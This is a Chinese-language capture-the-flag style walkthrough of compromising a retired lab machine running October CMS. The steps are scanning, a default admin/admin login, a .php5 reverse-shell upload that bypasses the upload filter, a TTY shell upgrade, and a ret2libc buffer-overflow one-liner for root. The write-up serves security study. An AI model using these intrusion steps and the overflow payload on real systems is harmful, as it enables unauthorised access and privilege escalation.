本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.16
nmap -sV -sC -p- -T5 -oN october.nmap 10.10.10.16
nmap扫描结果
只有两个端口,访问web应用看看
点了上面的功能按钮,没发现什么有价值的信息,使用dirb命令跑下目录
试了下上面发现的目录都测试了下,发现uri地址backend访问是个登录界面,并且上面显示是october cms程序,谷歌搜索了下,是默认账号密码admin/admin能够正常登录进去
进去之后上面的功能都点击了一把,发现 http://10.10.10.16/backend/cms/media 可以直接上传文件,经过测试我直接上传php后缀文件显示失败,然后看到目标靶机的上已经有了一个php5后缀的文件
那么直接上传个php5格式的反弹shell代码,结果成功了, 并成功反弹shell (october cms exploit : https://www.exploit-db.com/exploits/41936)
这次我就是使用非python环境升级成tty-shell ,具体步骤如下
非 python环境tty-shell
script /dev/null -c bash
在键盘上按住Ctrl+Z
stty raw -echo
fg
reset
会让你输入类型,输入:xterm
echo $TERM(查看类型,可以不执行)
export TERM=xterm
export SHELL=bash
stty rows 54 columns 104 (得到这个是在本地kali执行 stty -a所获得)
最终获得了tty-shell,使用提权枚举脚本https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 获取到本靶机是需要通过缓冲区溢出的方式进行提权,具体提权代码如下:
while true; do ./ovrflw $(python -c 'print "A"*112 + "\x10\x13\x5e\xb7\x60\x42\x5d\xb7\xac\x3b\x70\xb7"');done
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
